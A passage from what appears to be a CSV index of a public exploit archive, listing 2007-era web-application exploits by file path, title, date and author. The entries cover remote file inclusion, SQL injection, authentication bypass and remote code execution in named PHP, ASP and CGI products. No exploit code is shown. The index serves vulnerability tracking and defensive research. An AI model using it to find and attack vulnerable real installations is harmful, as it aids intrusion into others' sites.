Inclusion",2007-05-18,"Mehmet Ince",php,webapps, -3949,exploits/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps, -3953,exploits/php/webapps/3953.txt,"SunLight CMS 5.3 - 'root' Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps, -3955,exploits/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,php,webapps, -3956,exploits/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve",2007-05-20,BlackHawk,php,webapps, -3957,exploits/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve",2007-05-20,BlackHawk,php,webapps, -3958,exploits/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps, -3959,exploits/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps, -3960,exploits/php/webapps/3960.php,"WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing",2007-05-21,waraxe,php,webapps, -3962,exploits/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps, -3963,exploits/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps, -3964,exploits/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps, -3970,exploits/php/webapps/3970.txt,"BtiTracker 1.4.1 - Become Admin SQL Injection",2007-05-22,m@ge|ozz,php,webapps, -3971,exploits/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,php,webapps, -3972,exploits/php/webapps/3972.txt,"Scallywag - 'template.php?path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps, -3974,exploits/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php?course' SQL Injection",2007-05-23,Silentz,php,webapps, -3980,exploits/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php?scormcontopen' SQL Injection",2007-05-24,Silentz,php,webapps, -3981,exploits/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' SQL Injection",2007-05-24,Kacper,php,webapps, -3983,exploits/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusions",2007-05-24,DeltahackingTEAM,php,webapps, -3987,exploits/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php?root' Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps, -3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps, -3989,exploits/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php?id' SQL Injection",2007-05-25,Silentz,php,webapps, -3990,exploits/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps, -3991,exploits/php/webapps/3991.txt,"OpenBASE 0.6a - 'root_prefix' Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps, -3992,exploits/php/webapps/3992.txt,"FlaP 1.0b - 'pachtofile' Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps, -3994,exploits/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps, -3995,exploits/php/webapps/3995.txt,"TROforum 0.1 - 'admin.php?site_url' Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps, -3997,exploits/php/webapps/3997.txt,"Frequency Clock 0.1b - 'securelib' Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps, -3998,exploits/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,php,webapps, -3999,exploits/php/webapps/3999.txt,"Vistered Little 1.6a - 'skin' Remote File Disclosure",2007-05-28,GoLd_M,php,webapps, -4000,exploits/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps, -4003,exploits/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps, -4004,exploits/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps, -4005,exploits/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps, -4006,exploits/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps, -4007,exploits/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection",2007-05-30,BAHADIR,asp,webapps, -4019,exploits/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps, -4020,exploits/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve",2007-06-01,BlackHawk,php,webapps, -4022,exploits/php/webapps/4022.html,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps, -4025,exploits/php/webapps/4025.php,"Quick.Cart 2.2 - Local/Remote File Inclusion / Remote Code Execution",2007-06-02,Kacper,php,webapps, -4026,exploits/php/webapps/4026.php,"PNPHPBB2 < 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps, -4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,php,webapps, -4030,exploits/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps, -4031,exploits/php/webapps/4031.txt,"Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps, -4034,exploits/php/webapps/4034.txt,"Kravchuk letter script 1.0 - 'scdir' Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps, -4035,exploits/php/webapps/4035.txt,"Comicsense 0.2 - 'index.php?epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps, -4036,exploits/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution",2007-06-06,Silentz,php,webapps, -4037,exploits/php/webapps/4037.pl,"Comicsense 0.2 - 'index.php?epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps, -4039,exploits/php/webapps/4039.txt,"WordPress 2.2 - 'xmlrpc.php' SQL Injection",2007-06-06,Slappter,php,webapps, -4040,exploits/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps, -4041,exploits/php/webapps/4041.html,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion",2007-06-07,GoLd_M,php,webapps, -4054,exploits/php/webapps/4054.php,"e-Vision CMS 2.02 - SQL Injection / Remote Code Execution",2007-06-08,Silentz,php,webapps, -4055,exploits/php/webapps/4055.html,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",php,webapps, -4057,exploits/asp/webapps/4057.txt,"GeometriX Download Portal - 'down_indir.asp?id' SQL Injection",2007-06-09,CyberGhost,asp,webapps, -4059,exploits/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps, -4062,exploits/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - 'low.php?topic' SQL Injection",2007-06-12,Silentz,php,webapps, -4063,exploits/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps, -4064,exploits/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps, -4068,exploits/php/webapps/4068.txt,"XOOPS Module XFsection - 'modify.php' Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps, -4069,exploits/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - 'spaw_root' Remote File Inclusion",2007-06-13,g00ns,php,webapps, -4070,exploits/php/webapps/4070.txt,"XOOPS Module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,php,webapps, -4071,exploits/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - '559668.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps, -4072,exploits/php/webapps/4072.txt,"PHP::HTML 0.6.4 - 'PHPhtml.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps, -4074,exploits/php/webapps/4074.txt,"PHPMyInventory 2.8 - 'global.inc.php' Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps, -4075,exploits/php/webapps/4075.txt,"YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps, -4076,exploits/php/webapps/4076.php,"MiniBB 2.0.5 - 'Language' Local File Inclusion",2007-06-17,Dj7xpl,php,webapps, -4078,exploits/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve",2007-06-18,BlackHawk,php,webapps, -4079,exploits/php/webapps/4079.txt,"MiniBill 1.2.5 - 'run_billing.php' Remote File Inclusion",2007-06-18,Abo0od,php,webapps, -4081,exploits/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,php,webapps, -4082,exploits/php/webapps/4082.pl,"LiveCMS 3.4 - 'categoria.php?cid' SQL Injection",2007-06-20,g00ns,php,webapps, -4083,exploits/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,asp,webapps, -4084,exploits/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps, -4085,exploits/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps, -4086,exploits/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion",2007-06-20,Kw3[R]Ln,php,webapps, -4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps, -4090,exploits/php/webapps/4090.pl,"Powl 0.94 - 'htmledit.php' Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps, -4091,exploits/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps, -4092,exploits/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",php,webapps, -4095,exploits/php/webapps/4095.txt,"Pharmacy System 2.0 - 'index.php?ID' SQL Injection",2007-06-24,t0pP8uZz,php,webapps, -4096,exploits/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps, -4097,exploits/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps, -4098,exploits/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php?submit' SQL Injection",2007-06-24,Kacper,php,webapps, -4099,exploits/php/webapps/4099.txt,"e107 < 0.7.8 - 'photograph' Arbitrary File Upload",2007-06-24,g00ns,php,webapps, -4100,exploits/php/webapps/4100.txt,"phpTrafficA 1.4.2 - 'pageid' SQL Injection",2007-06-24,"laurent gaffié",php,webapps, -4102,exploits/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php?tfooter' Remote File Inclusion",2007-06-25,Rf7awy,php,webapps, -4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps, -4104,exploits/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps, -4105,exploits/php/webapps/4105.txt,"SiteDepth CMS 3.44 - 'ShowImage.php?name' File Disclosure",2007-06-25,"H4 / XPK",php,webapps, -4106,exploits/php/webapps/4106.php,"DreamLog 0.5 - 'upload.php' Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps, -4107,exploits/php/webapps/4107.txt,"Pagetool 1.07 - 'news_id' SQL Injection",2007-06-25,Katatafish,php,webapps, -4108,exploits/php/webapps/4108.txt,"eDocStore - 'doc.php?doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps, -4111,exploits/php/webapps/4111.txt,"PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion",2007-06-26,GoLd_M,php,webapps, -4112,exploits/php/webapps/4112.txt,"EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps, -4113,exploits/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps, -4114,exploits/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps, -4115,exploits/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps, -4116,exploits/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps, -4122,exploits/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps, -4124,exploits/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps, -4125,exploits/php/webapps/4125.txt,"WebChat 0.78 - 'login.php?rid' SQL Injection",2007-06-28,r00t,php,webapps, -4127,exploits/php/webapps/4127.txt,"Buddy Zone 1.5 - 'view_sub_cat.php?cat_id' SQL Injection",2007-06-29,t0pP8uZz,php,webapps, -4128,exploits/php/webapps/4128.txt,"Buddy Zone 1.5 - Multiple SQL Injections",2007-06-30,t0pP8uZz,php,webapps, -4129,exploits/php/webapps/4129.txt,"Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion",2007-06-30,BlackNDoor,php,webapps, -4130,exploits/php/webapps/4130.txt,"TotalCalendar 2.402 - 'view_event.php' SQL Injection",2007-06-30,t0pP8uZz,php,webapps, -4131,exploits/php/webapps/4131.txt,"XCMS 1.1 - 'Galerie.php' Local File Inclusion",2007-06-30,BlackNDoor,php,webapps, -4132,exploits/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusions",2007-06-30,"Mehmet Ince",php,webapps, -4133,exploits/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps, -4134,exploits/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,php,webapps, -4135,exploits/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection",2007-07-01,Iron,php,webapps, -4136,exploits/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php?id' SQL Injection",2007-07-02,t0pP8uZz,php,webapps, -4138,exploits/php/webapps/4138.txt,"AV Arcade 2.1b - 'index.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps, -4139,exploits/php/webapps/4139.txt,"PHPDirector 0.21 - 'videos.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps, -4140,exploits/php/webapps/4140.txt,"vbzoom 1.x - 'forum.php?MainID' SQL Injection",2007-07-02,"Cold Zero",php,webapps, -4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps, -4142,exploits/php/webapps/4142.txt,"Girlserv ads 1.5 - 'details_news.php' SQL Injection",2007-07-03,"Cold Zero",php,webapps, -4144,exploits/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps, -4145,exploits/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps, -4147,exploits/php/webapps/4147.php,"PNPHPBB2 < 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps, -4150,exploits/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps, -4151,exploits/php/webapps/4151.sh,"AsteriDex 3.0 - 'callboth.php' Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps, -4153,exploits/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps, -4154,exploits/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps, -4156,exploits/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps, -4159,exploits/php/webapps/4159.txt,"GameSiteScript 3.1 - profile id SQL Injection",2007-07-07,Xenduer77,php,webapps, -4161,exploits/php/webapps/4161.txt,"FlashGameScript 1.7 - 'user' SQL Injection",2007-07-08,Xenduer77,php,webapps, -4163,exploits/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change",2007-07-08,Dj7xpl,php,webapps, -4164,exploits/php/webapps/4164.txt,"Aigaion 1.3.3 - 'topic topic_id' SQL Injection",2007-07-09,CypherXero,php,webapps, -4166,exploits/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection",2007-07-10,t0pP8uZz,php,webapps, -4167,exploits/php/webapps/4167.txt,"OpenLD 1.2.2 - 'index.php?id' SQL Injection",2007-07-10,CypherXero,php,webapps, -4169,exploits/php/webapps/4169.txt,"FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps, -4171,exploits/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps, -4173,exploits/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps, -4174,exploits/php/webapps/4174.txt,"PsNews 1.1 - 'show.php?newspath' Local File Inclusion",2007-07-12,irk4z,php,webapps, -4179,exploits/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps, -4180,exploits/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps, -4182,exploits/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps, -4183,exploits/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps, -4184,exploits/php/webapps/4184.txt,"Realtor 747 - 'index.php?categoryId' SQL Injection",2007-07-14,t0pP8uZz,php,webapps, -4185,exploits/php/webapps/4185.txt,"Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps, -4186,exploits/php/webapps/4186.txt,"paFileDB 3.6 - 'search.php' SQL Injection",2007-07-14,pUm,php,webapps, -4187,exploits/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php?offset' SQL Injection",2007-07-16,t0pP8uZz,php,webapps, -4189,exploits/php/webapps/4189.txt,"Expert Advisior - 'index.php?id' SQL Injection",2007-07-17,t0pP8uZz,php,webapps, -4191,exploits/php/webapps/4191.txt,"Pictures Rating - 'index.php?msgid' SQL Injection",2007-07-18,t0pP8uZz,php,webapps, -4192,exploits/php/webapps/4192.html,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,php,webapps, -4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,php,webapps, -4194,exploits/php/webapps/4194.txt,"Joomla! Component Expose RC35 - Arbitrary File Upload",2007-07-18,"Cold Zero",php,webapps, -4195,exploits/php/webapps/4195.txt,"BBS E-Market - 'postscript.php?p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps, -4197,exploits/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - 'link_main.php' Remote File Inclusion",2007-07-18,bd0rk,php,webapps, -4198,exploits/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps, -4199,exploits/php/webapps/4199.txt,"Md-Pro 1.0.8x - Topics topicid SQL Injection",2007-07-18,anonymous,php,webapps, -4201,exploits/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps, -4206,exploits/php/webapps/4206.txt,"Blog System 1.x - 'index.php?news_id' SQL Injection",2007-07-20,t0pP8uZz,php,webapps, -4209,exploits/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' SQL Injection",2007-07-21,t0pP8uZz,php,webapps, -4210,exploits/php/webapps/4210.txt,"RGameScript Pro - 'page.php?id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps, -4211,exploits/php/webapps/4211.html,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps, -4212,exploits/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps, -4213,exploits/php/webapps/4213.txt,"bwired - 'index.php?newsID' SQL Injection",2007-07-22,g00ns,php,webapps, -4219,exploits/php/webapps/4219.txt,"Confixx Pro 3.3.1 - 'saveserver.php' Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps, -4220,exploits/php/webapps/4220.pl,"Entertainment CMS - Local File Inclusion / Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps, -4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps, -4224,exploits/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps, -4225,exploits/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' SQL Injection",2007-07-25,xssvgamer,php,webapps, -40466,exploits/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps, -4235,exploits/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps, -4238,exploits/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps, -4239,exploits/asp/webapps/4239.txt,"SimpleBlog 3.0 - 'comments_get.asp?id' SQL Injection",2007-07-28,g00ns,asp,webapps, -4241,exploits/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php?cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps, -4242,exploits/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps, -4246,exploits/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps, -4248,exploits/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - 'mapId' SQL Injection",2007-07-31,"Mehmet Ince",php,webapps, -4253,exploits/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - 'main.php?cid' SQL Injection",2007-08-02,uimp,php,webapps, -4254,exploits/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,php,webapps, -4256,exploits/php/webapps/4256.pl,"Envolution 1.1.0 - 'topic' SQL Injection",2007-08-05,k1tk4t,php,webapps, -4258,exploits/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps, -4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps, -4264,exploits/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps, -4265,exploits/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php?cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps, -4267,exploits/php/webapps/4267.txt,"PhpHostBot 1.06 - 'svr_rootscript' Remote File Inclusion",2007-08-07,K-159,php,webapps, -4268,exploits/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Remote File Inclusion",2007-08-07,kezzap66345,php,webapps, -4269,exploits/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps, -4271,exploits/php/webapps/4271.txt,"FishCart 3.2 RC2 - 'fc_example.php' Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps, -4273,exploits/php/webapps/4273.txt,"Ncaster 1.7.2 - 'archive.php' Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps, -4275,exploits/php/webapps/4275.php,"PHP Blue Dragon CMS 3.0.0 - SQL Injection",2007-08-10,Kacper,php,webapps, -4276,exploits/php/webapps/4276.txt,"PHP blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps, -4277,exploits/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,php,webapps, -4278,exploits/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php?root' Remote File Disclosure",2007-08-10,Rizgar,php,webapps, -4282,exploits/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,php,webapps, -4284,exploits/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps, -4286,exploits/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,cgi,webapps, -4291,exploits/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,php,webapps, -4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps, -4296,exploits/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps, -4300,exploits/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,php,webapps, -4305,exploits/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,php,webapps, -4306,exploits/php/webapps/4306.txt,"Mambo Component Remository - 'cat' SQL Injection",2007-08-23,ajann,php,webapps, -4307,exploits/php/webapps/4307.txt,"Joomla! Component RSfiles 1.0.2 - 'path' File Download",2007-08-23,ajann,php,webapps, -4308,exploits/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - 'tagid' SQL Injection",2007-08-23,ajann,php,webapps, -4309,exploits/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - 'did' SQL Injection",2007-08-23,ajann,php,webapps, -4310,exploits/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps, -4313,exploits/php/webapps/4313.pl,"SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps, -4317,exploits/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps, -4320,exploits/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php?skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps, -4326,exploits/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps, -4327,exploits/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection",2007-08-27,D4m14n,php,webapps, -4329,exploits/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",php,webapps, -4330,exploits/php/webapps/4330.txt,"ACG News 1.0 - 'aid'/'catid' SQL Injection",2007-08-28,SmOk3,php,webapps, -4331,exploits/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps, -4332,exploits/php/webapps/4332.txt,"VWar 1.5.0 R15 - 'mvcw.php' Remote File Inclusion",2007-08-28,DNX,php,webapps, -4333,exploits/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - 'mvcw_conver.php' Remote File Inclusion",2007-08-28,DNX,php,webapps, -4336,exploits/php/webapps/4336.txt,"xGB 2.0 - 'xGB.php' Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps, -4338,exploits/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,php,webapps, -4339,exploits/php/webapps/4339.txt,"PHPNS 1.1 - 'shownews.php?id' SQL Injection",2007-08-29,SmOk3,php,webapps, -4340,exploits/php/webapps/4340.txt,"phpBG 0.9.1 - 'rootdir' Remote File Inclusion",2007-08-29,GoLd_M,php,webapps, -4341,exploits/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps, -4342,exploits/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps, -4343,exploits/cgi/webapps/4343.txt,"Ourspace 2.0.9 - 'uploadmedia.cgi' 